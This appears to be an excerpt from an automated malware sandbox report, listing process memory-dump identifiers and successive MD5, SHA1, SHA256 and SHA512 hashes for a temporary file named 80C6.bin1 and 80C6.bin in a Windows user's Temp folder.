memory/3692-198-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 6d6a8b3f318fd3d8cef74f5a606d175b
SHA1 bbf142b78df2ef8bae740e28e29499f98f443144
SHA256 6c42afc4e424041bd3f8c7b6bd18cb969e3a556a013d045d0ee511e014913add
SHA512 3cd2beb275fd39a7ba74cbf71368ec36d9580826603f144488a0ddaba6cb0047a03f362915ce7e0ec81ee199d0af2f8f8e0a1ecab44b2433f12bbe3f03774b04

memory/3472-200-0x0000000000000000-mapping.dmp

memory/2120-201-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 f970ec5d20d2fba20631ebcd079bde53
SHA1 a68f1ea0ac316fecc6d140097950a86c203a48e4
SHA256 4edcdabe17008fb62ce6ab79154718ea0a638e6e663e72c8112898ead8948fa4
SHA512 9b43735db140856086ebb5ad7d1abfea163bdd1d7d4ccca289b661ccf6417d0be9f82e344d92b1893119d81013bff53f029c94fad28db983b287010459e042dd

memory/2336-203-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 f970ec5d20d2fba20631ebcd079bde53
SHA1 a68f1ea0ac316fecc6d140097950a86c203a48e4
SHA256 4edcdabe17008fb62ce6ab79154718ea0a638e6e663e72c8112898ead8948fa4
SHA512 9b43735db140856086ebb5ad7d1abfea163bdd1d7d4ccca289b661ccf6417d0be9f82e344d92b1893119d81013bff53f029c94fad28db983b287010459e042dd

memory/1556-205-0x0000000000000000-mapping.dmp

memory/1792-206-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 b14ca353fa4187bac21f5ab89ba9a11c
SHA1 fed2d6b01963a4aac5ec7942f5d7e09ca6ddf310
SHA256 0f629f4157821999e27bbd0f8fd0443d62589646daa6cbd165292a876194c943
SHA512 ba1c82cb93e0c33574c806a6680e2594e30d4af8c90379b36ae46199d4e19d9ba7a0eb46f1b120398c810f84ec673f12b164ef39049235bb4b12e0b6a1965905

memory/2140-208-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 714de7881b6a1035c086c517850de473
SHA1 2f7d0b5388ae3169c976b82a41a6463d83b2c635
SHA256 d14c84a41e44ae9c73535af482c1e7fae5db45c1400fab66f8b7dcec66ac900e
SHA512 4150c13a5c1b598965ad8cf5aa98d0e23405fecb7c2917598621c375fcaa7afeb22b1e588fb06ed1ab63b462a6ea8bfbebf56b7ff62290dba4bf35bdee6e79c9

memory/796-210-0x0000000000000000-mapping.dmp

memory/4252-211-0x0000000000000000-mapping.dmp

memory/4996-212-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 f598a0e91678e4a3ab5262f92a2fc126
SHA1 faf8e24e200debcb4ea8c1a5fc97d3428e0981c5
SHA256 e426336dfe2774f86b7cb3c1962a86d5eae6c7c22f4d4117edf3d819eda8bc3b
SHA512 199dfc3cf019979c8146c873d06b5e0b8a893db0adb0dc4e2e27231801b9e9ea47335144bd2357b81ab4ab1ed03e854020c84e41f2b45519e149255578bb1101

memory/1088-214-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 491781928626aa6de588e5e1e944e765
SHA1 38b2d33c01fc8fa99b7fa029d9cf54d803118030
SHA256 1031f0822bb6b82b229e312d363c79c6f513c5dd9eab88a545e8e897d5728571
SHA512 2118849ffbbfdb731041b3d05516083fe386541fadf2908eff0935620f8d4076e79581896465da11f74331d812c633c73da184f80e75343f3df7c3e9b7b75f8f

memory/3592-216-0x0000000000000000-mapping.dmp

memory/1124-217-0x0000000000000000-mapping.dmp

memory/1208-218-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 855fc1aa369e8cc7fce0b1957427918e
SHA1 20e2a9272e85fdc40a08cbf4dbba9e6d3d7f8fa4
SHA256 a6326c7a78fd3240e9ee70e2666ee60dcbbac5f24d642d9038a8075542009c20
SHA512 2b69fb54aa6fbba546c9339b5efbf675e3ba25f661158bf609ba63ca6f96241ff01aec9c34415a09b42606a6864ecdef941a767d1f3994845605c078ff45f11a

memory/2920-220-0x0000000000000000-mapping.dmp

memory/4356-221-0x0000000000000000-mapping.dmp

memory/4852-222-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 44d578ac531f2f93c3a515e3f72a4e62
SHA1 7517f39370ac5fc4a80c7572d3a5c15aebe0fb2f
SHA256 64b087f809be517e84779845447554cf9103bc52953202f330d84f24ae252838
SHA512 4bf075c425a9f4d6b5869e91ec533de5a2d15c8a1d8fb9b5c39f1b49b555629a4720ce65e4323bf6c84fd6b3083392e387ce7f6386b5f1c96280ef727d2b736d

memory/4476-224-0x0000000000000000-mapping.dmp

memory/3312-225-0x0000000000000000-mapping.dmp

memory/1704-226-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 561bef9af1d2b3cd08f865fe88ed8b87
SHA1 de383abc60321ffa36cb8d718bdc9205b4300764
SHA256 8f60e06f4a1d259c2cbe505612fa9b4972a8d04703f95ec9baa42d57e6d37463
SHA512 03da980c68887047560a3b305c23b9ffc067b1798bca12a94390af6573ce3d9acbd55c696bd602e83075bb599d61e32da1c7d5312a20c0ea3515207a3715820d

memory/696-228-0x0000000000000000-mapping.dmp

memory/1808-229-0x0000000000000000-mapping.dmp

memory/3952-230-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\80C6.bin1

MD5 6bd79a5adab7a3e2068c0427e0e4b70c
SHA1 d4159171c427cdd8e11336d21666960b3624f178
SHA256 bd253388681126be29d3a08fa47c2fd721512973ba6d50203a7b2791c9bc680b
SHA512 34736868d8e5bb606ad31c78ed82b57fdea35c9da8f4e02fa47f3a003d429ec56ee33fb1e0d2396c7d9e3c6f0d190d77045ac60fe39dcf30cebbcb41e9fff65e

C:\Users\Admin\AppData\Local\Temp\80C6.bin

MD5 6bd79a5adab7a3e2068c0427e0e4b70c
SHA1 d4159171c427cdd8e11336d21666960b3624f178
SHA256 bd253388681126be29d3a08fa47c2fd721512973ba6d50203a7b2791c9bc680b
SHA512 34736868d8e5bb606ad31c78ed82b57fdea35c9da8f4e02fa47f3a003d429ec56ee33fb1e0d2396c7d9e3c6f0d190d77045ac60fe39dcf30cebbcb41e9fff65e